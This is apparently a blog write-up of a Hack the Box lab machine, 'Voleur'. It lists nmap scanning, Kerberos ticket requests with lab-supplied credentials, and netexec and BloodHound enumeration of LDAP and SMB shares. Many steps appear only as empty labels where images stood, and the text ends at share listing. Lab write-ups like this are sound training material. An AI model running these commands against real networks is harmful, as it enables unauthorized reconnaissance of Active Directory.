Advertisement

Main Ad

Voleur HTB Walkthrough

Hello and welcome to another Hack the Box walkthrough. In this blog post, I am going to show you how I pwned the Voleur machine on hack the box. If you are new to this channel, please don’t forget to like, comment, and subscribe to my YouTube channel for more awesome content. Also, don’t forget to follow me on LinkedIn and X for more HTB walkthrough and cybersecurity related contents.

About the Machine

Voleur is a medium Windows machine


The first step in pwning the Voleur machine like I have always done in my previous writeups is to connect my Kali Linux terminal with Hack the Box server. To establish this connection, you need to run the following command in your terminal:

sudo openvpn voleur.ovpn

After the connection has been set up, I started the target machine, and I was assigned an IP address of 10.10.11.76. Then I performed reconnaissance using Nmap to find all the open port and services associated with the target machine. Using the following command, I found all the services and port running at 10.10.11.76:
nmap -sCV -A 10.10.11.76
1:
2:
3:
sudo nano /etc/hosts
x:
y:
z:
timedatectl set-ntp off
a:

b:

impacket-getTGT voleur.htb/'ryan.naylor':'HollowOct31Nyt'
c:

d:

export KRB5CCNAME=/home/boltech/Desktop/VoleurHTB/ryan.naylor.ccache
e:

f:

nxc ldap voleur.htb -u ryan.naylor -p HollowOct31Nyt -k
g

h:

nxc smb dc.voleur.htb -u ryan.naylor -p HollowOct31Nyt -k
i:

j:

bloodhound-python -u ryan.naylor -p HollowOct31Nyt -k -ns 10.10.11.76 -c All -d voleur.htb --zip

k:

l:

netexec smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --shares --smb-timeout 500

m:

Post a Comment

1 Comments